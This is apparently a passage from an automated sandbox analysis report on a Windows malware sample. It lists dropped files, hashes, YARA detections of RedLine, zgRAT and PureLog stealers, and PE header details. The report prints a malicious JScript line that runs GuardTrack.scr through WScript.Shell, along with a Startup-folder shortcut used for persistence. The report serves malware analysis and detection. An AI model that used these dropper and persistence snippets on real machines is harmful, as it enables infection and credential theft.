Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\TmpEAC5.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\6rxotqIg7H.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\TmpEAD5.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\6rxotqIg7H.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\Whom

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe
File Type:	data
Category:	dropped
Size (bytes):	67584
Entropy (8bit):	7.997347802965752
Encrypted:	true
SSDEEP:	1536:AZcxT5PMfnoT5IAyrEBysFZAken7iV0myzZMJMqNW:AGXkoTCAxBysFDen7I0mKZMXc
MD5:	CF18A7ED11645523ADDBD2FBB31B014D
SHA1:	09CAF4ED6B6822E838D3512CE5A75E4125192C5F
SHA-256:	27DBF0E6F006AE0F7FA94CD33287E7F3AB85E1FA637636EFF8E94EB649E45990
SHA-512:	F1CFC3FBACCFCD199B99AC647A2A0F76A05A7DB1B655FA2E9DE44DEF1630BEBBFDBBD814225664F2D7D7015FF73B87C02242BEC5105460459694F03E836F0D56
Malicious:	true
Preview:	U.v.)....F.VF..r...lgr.#.L...!...~.....K@.Bu..v..........u.m[g5.t......'...0f..8B....,..q.1-..n......x.zN..........U.....J..<.LHb.j.. ..<.>ha..v~}..m.+s.......7.....C ........}...../........8.i..d....#.Q^K./-DQ^.:...S.E.Wu...1.,WY.R8+.,...<\8.=.....'.;.9.U?.8.hZ.'.........L..C.x.v3.8.....w4ub?X...t.r.`\|.[../.....n.%.{W.y......,..1g....+.@J..y.AZXR.....]\'._jS...0.g......>R..CL..m..".......rO.b.f.f_.-.......x.x..+.t./.....d5..4..z....W. j.>...2x'.i.){.Qy..B.(.>....a-.h.....G........u..r.......1. ..{.X...`.A..@....u..o....4......H.+?.t....r.....].. .1...VD..c...OB...R.E.....g...g.%I....y.r..1...OL6.Z...E..+5.....3.C&.....0M.t%.qT..v.g.>X..f"W..n.]l.......2........y.-.k..3#..sCGE.P..W..7....X..{.f^.7....W..t......\|\|WF.$.,B`O....'.b..tpKu]...C.@.C.........z..s.....>y[.:^....Dn..Y..).2y.....t8....7.E17MW."G..df.V.Plr8...5..........#.......;!,..g...u9P...f.}..{...h'.....^....p-/...i....a...r\..b......n.5...Fo.ZU..%../>8.<c....

C:\Users\user\AppData\Local\Temp\Wireless

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe
File Type:	data
Category:	dropped
Size (bytes):	65112
Entropy (8bit):	7.996543686201188
Encrypted:	true
SSDEEP:	1536:BPYs0v/j8Hkrp5mua/2KosFnVD6i5nckhaGx54u/zb:CsO8Hipna/l6Av
MD5:	DF9A85AF5771EA736A104B6E3EB86F0B
SHA1:	319CB80EED888D089AB5B6944ADBCBE89C3195EB
SHA-256:	CEE5172F67CACBC90062C13713A08561B6984CB6C3C98663B7E541445B2FD492
SHA-512:	8E7AEDBE38BEDF9A0C167F778EB7678B6AD73F56E1F1196EAF771C01B8D6CD2A99FF015190EFCF3F7E340979E501172D2D606E3E3B9AE53873AB9244AAF10EB9
Malicious:	true
Preview:	%.4m..z.,..9.).._......lV.....B1.bb.....2.AN...bb..L..6.!;..vHiJ..l.Nl..F\|3_....p......s.S..-...A.e...Q.z...MPC..7.dpK..Xy...<...!L.... h...F......n(.......,fO..c....A3!...gL......].$....1.edn!..r.Uh~..?"....{. yN.....Av..Z@.......I..qN.....O5.L.[.q.N..s. .v...;..].B{.1.h...c...O.1.e.-].Y6=..\.9l U...$=.K.!.j.w..7..wt.@77.oLV.6..!...q./....xL .-._f...E..c..C~O.9...v.eH.......?...2k.(=H.....$j(...;Qb....j].T..P.h...j.}....^.D....3.'.....in...3y...q.[!.A.f...}y..j%$a.p^Ss.Z....a..#.5>k..u...5..y........1..~..~..d..}L\|.ci.sfT..i......G..i?.....w..L.zv>.....X...27...X....&L......gnK{[.kV.....W)...a.T..M.%..iC...y.A....3duJ.w+.H7....H.....6......a.s3.X..nV..a..q........a9.D.1j?....If.s^..s.]..8.....p.P.};....m....E'.g..k..M{...$..<.v6.&...&u....PH&dMT%.f..#B0v4.... ..B.s.~..u.E.BQ'..m.F5.....b..\|..o0{c..V..W.S....R..R.B:.W.4.....%.Q..'.....U$..[.yhx..yF..\|./..........v.j..g......ft.NA...-nV.r.=.g.E.!"J.A.bp...n.....1.:....K;...E..p...A.

C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js

Download File

Process:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	187
Entropy (8bit):	4.760030605070939
Encrypted:	false
SSDEEP:	3:RiMIpGXIdPHo55wWAX+aJp6/h4EkD5xXEZz+LAGQ+EBxXvfiZo5uWAX+aJp6/h4I:RiJBJHonwWDaJ0/hJkDvXEhapoRyywWh
MD5:	B11FD7E16E222D604DFEEF154E83939A
SHA1:	3F00113773E4EC6169C9A1F4965387F305158724
SHA-256:	D7B7398F7E8E2D72636502D4AE48DF216A819242EADC6D10A812B55328FEB246
SHA-512:	E33F8ABB207EC6372CB409C6EDB8868B060D58319E0EA7D4BA0AF28C73F3D8E39E9E9162708B01A14CB0B5BAE770598B5D3034B975D3E9BE7532A7B36C685E42
Malicious:	true
Preview:	new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\TrackGuard Technologies\\GuardTrack.scr\" \"C:\\Users\\user\\AppData\\Local\\TrackGuard Technologies\\z\"")

C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Download File

Process:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	893608
Entropy (8bit):	6.62028134425878
Encrypted:	false
SSDEEP:	12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
MD5:	18CE19B57F43CE0A5AF149C96AECC685
SHA1:	1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
SHA-256:	D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512:	A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\TrackGuard Technologies\z

Download File

Process:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
File Type:	data
Category:	dropped
Size (bytes):	792152
Entropy (8bit):	7.999752041562741
Encrypted:	true
SSDEEP:	12288:S2txcY4Gu0kDVO9n0NZEncdRSu0QqcbI0pLZ3h3r6MorbtDTb85w491BIvgvW6E:f/Tu/4kuu0QqcbxZh3ribh05w4zwgvRE
MD5:	6A22704AE494645CA19955DE0CB879BC
SHA1:	ACC40B89422C32563656441519DF5D2199772398
SHA-256:	F4E8BEB419142C0B8152CD8028B95A877B938A1F400C610DEE9E4139484385D6
SHA-512:	3852D5E7D29BE2B89008C9A970D4770A5D4599D6F75B4927FB56CA12FDC7BA5DB0D2A6425786EC71A57A86342FCFC669E6CFB724683922FEB5175DD369A5D687
Malicious:	true
Preview:	K..J...vz..I`..i....D..t.....k7...W.9..r.a.z.\......_..........v.w.Y........'\|.....$...!}.E..er.I.F.#5UA...B7S!u\../R.iU@.TsF.....WJ_6.Kd.f.B}.)t.KqBG0..?.....?&9;...%..o.x...v.P.&+n.5j..^..D.-..%@.w.}..}..?..q.../.>G.S..~..a..U.O...yJ..b..E.%X...../P).....UN".,&..j..%4....o.........zZ.......y,..? ..+.!5S......Q. ..n;........Zw..l...`..r'?..\|.'..Y.J...k..B.zW..no..Rk."....\|.!..N..X h....Gn...A...FRA.\M..@... 1d....N.G.....EPq......i...yX..-&=.........m......G......U.......Qp...WC .0...L..h.q.....k.{.R.....l._oLL..p[....QL5..}.%K.F....K...#$Q,..n.=..\b.3.u:#p..g.ju...,~-'.n..F=...N.%....@/...K.L..r..]S./;.....oQ..a.......-s.`.gB..A....R.SJ...bO<..&\|_..VZ...d(>.2..P.f. <z....H$...Nd(....!\...R.f...[#..Z{e..@j...G.c1...]MX..?..I.:...@.3I&......E..k.5.....E.t;....0.O..\/.L-c....R..\|...jE!....z,.....kM..m.8.!.......j......iS.q.<...CB;].wY2...4Q3.2.-....]:ih....'..c..V..ht.... >?I. .J...C].l...8F..r{S.'..N).P.s.>.......b....Y.6G.P#........

C:\Users\user\AppData\Roaming\6rxotqIg7H.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	311296
Entropy (8bit):	5.082156492931411
Encrypted:	false
SSDEEP:	3072:sq6EgY6iChfrUjHcQZwP7h5kQgnKyyeTAXtUSiVlcZqf7D34leqiOLibBOe:nqY6iChawPfkx7yeTAdUblcZqf7DIvL
MD5:	30F46F4476CDC27691C7FDAD1C255037
SHA1:	B53415AF5D01F8500881C06867A49A5825172E36
SHA-256:	3A8F5F6951DAD3BA415B23B35422D3C93F865146DA3CCF7849B75806E0B67CE0
SHA-512:	271AADB524E94ED1019656868A133C9E490CC6F8E4608C8A41C29EFF7C12DE972895A01F171E8F625D07994FF3B723BB308D362266F96CB20DFF82689454C78F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d.9...............0................. ... ....@.. ....................... ............@.................................t...O.... ..............................X................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\2868611ef16e8486b41d784e0dd77bf9_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\AppData\Roaming\6rxotqIg7H.exe
File Type:	data
Category:	dropped
Size (bytes):	2251
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	0158FE9CEAD91D1B027B795984737614
SHA1:	B41A11F909A7BDF1115088790A5680AC4E23031B
SHA-256:	513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
SHA-512:	C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\76b53b3ec448f7ccdda2063b15d2bfc3_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	2251
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	0158FE9CEAD91D1B027B795984737614
SHA1:	B41A11F909A7BDF1115088790A5680AC4E23031B
SHA-256:	513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
SHA-512:	C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js" >), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	99
Entropy (8bit):	4.901237783596364
Encrypted:	false
SSDEEP:	3:HRAbABGQaFyw3pYoUkh4E2J5xXK+LAGQ+axXvGgc:HRYF5yjo923RKapaROgc
MD5:	36E7AB4A35DC5D68061BACF9622A9C95
SHA1:	D056707D6151F4CD93B20898789DEF672A706123
SHA-256:	F113CB9545CAFF34A1D0D72A133778EF8216D23FF6AF40500C3963615195844C
SHA-512:	8D77DD2F23A82882BF3CB06C97DF41F1ADB628164FFA8354DC3647E45CFAF18BF4D39143F61CBFCB68CC829D58B8A813AC1BB9D29217C0F48459E11A9957C408
Malicious:	true
Preview:	[InternetShortcut] ..URL="C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js" ..

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	557056
Entropy (8bit):	6.311657384729558
Encrypted:	false
SSDEEP:	6144:q9DfA3bgFn8PGgNryMVOa/agTyqYYlHg8q16ODfL5DAq6syp2cbYJNLhTx:q9DfW68ugNus+qgZ1zLlDly2b
MD5:	88367533C12315805C059E688E7CDFE9
SHA1:	64A107ADCBAC381C10BD9C5271C2087B7AA369EC
SHA-256:	C6FC5C06AD442526A787989BAE6CE0D32A2B15A12A41F78BACA336B6560997A9
SHA-512:	7A8C3D767D19395CE9FFEF964B0347A148E517982AFCF2FC5E45B4C524FD44EC20857F6BE722F57FF57722B952EF7B88F6249339551949B9E89CF60260F0A714
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A/................0..,...R......^J... ...`....@.. ....................................@..................................J..K....`...O........................................................................... ............... ..H............text...d... ...,.................. ..`.rsrc....O...`...P..................@..@.reloc...............~..............@..B................@J......H.......\|Z...x......<...X....)..............................................(....*..0...........s........~....%:....&~......!...s....%.....(...+o.....8[....o...............%..F~s...(.....%..G~s...(.....%..H~s...(.....%..e~s...(.....~t...(.......o......8......(......s.......sK.......~....}....~...........s....(....o....}......{.....I~s...(....o........9......I~s...(.......8C........~s...(....o....:......{....~u...(....8......{....~v...(.........(...........9........o........(

C:\Windows\Tasks\Hkbsse.job

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe
File Type:	data
Category:	dropped
Size (bytes):	290
Entropy (8bit):	3.4166902616297703
Encrypted:	false
SSDEEP:	6:pXjlVX55ZsUEZ+lX1E5WEetFXqYEp5t/uy0lFXpt0:pXjlRuQ1HfXV/t0
MD5:	A7C2B79C7D983F2049BAEC68EB1071E9
SHA1:	91F40DEEF283135BF3F9976026D608935EFA1D24
SHA-256:	8A0818855F3A3501FA69EE5703D95F89E66A48E11B1799468D042D64F11659A3
SHA-512:	2816F570C9DED68A51BCB6E2F362947AB72AD638F4213D8926325D8DB02E4287C84BB99D3EEF265669E6D52A47C03083FCF52A711E3CB23C439EB57774870610
Malicious:	false
Preview:	.......i. dG.0.G.8..F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.0.5.4.f.d.c.5.f.7.0.\.H.k.b.s.s.e...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0.................-.@3P.........................

C:\Windows\Tasks\axplong.job

Download File

Process:	C:\Users\user\Desktop\OmnqazpM3P.exe
File Type:	data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	3.423872733576295
Encrypted:	false
SSDEEP:	6:cYnX45ZsUEZ+lX1lOJUPelkDdtFXqYEp5t/uy0lFXot0:3DQ1lOmeeDNfXVmt0
MD5:	02F22AB1CAD3DB1167BED4C04AAF9B0E
SHA1:	885DB2ECA477C45C7EE197F09FC584F4AA7BA048
SHA-256:	DEAA8CFC43B3E3638E83EDB08EFA76043B09CD9E07F6CDF8553406D052D2C424
SHA-512:	6FEEDC648B71D7F14003739BE4CB30E733741F47751D5A3559E1A73B18B19E27F3A0CFBE1B4A7FC52B8F7CA4F5F3FAF89AEBCE8823AEEE29D92B7574938EE35F
Malicious:	false
Preview:	.....4?.F.MM..M(..F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0.................,.@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.949716464322959
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	OmnqazpM3P.exe
File size:	1'904'128 bytes
MD5:	51abf67011f60975d76946357ee94a48
SHA1:	ca1761459e162628d9db5093f1935834ba36214d
SHA256:	438fee0f31c00d0de0b13027e8ec9c47030556d3d8865e5518cac184edf6cd0a
SHA512:	597210f441a0df09e537854f0f387109f1f1a780b948417890ec35c3868121f6eee5f9ff5cb48cd9523649e1689a337530de7325b659df3226d26cc32ffb402d
SSDEEP:	49152:90+/6lnwtw5s/CIUFXottseV1jOBGpusqdZg/:4lnps3ttseu8pung
TLSH:	009533BF7537F9DDE8C11D77ED3267231A3DF8EB88269801222A2512C7935B6C089671
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x8b9000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F8D1509D0FAh
paddsb mm3, qword ptr [eax+eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F8D1509F0F5h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx], al
or al, byte ptr [eax]
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [edx], al
or al, byte ptr [eax]
add byte ptr [ecx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [0000000Ah], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4b6ec8	0x10	ogvicfhk
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
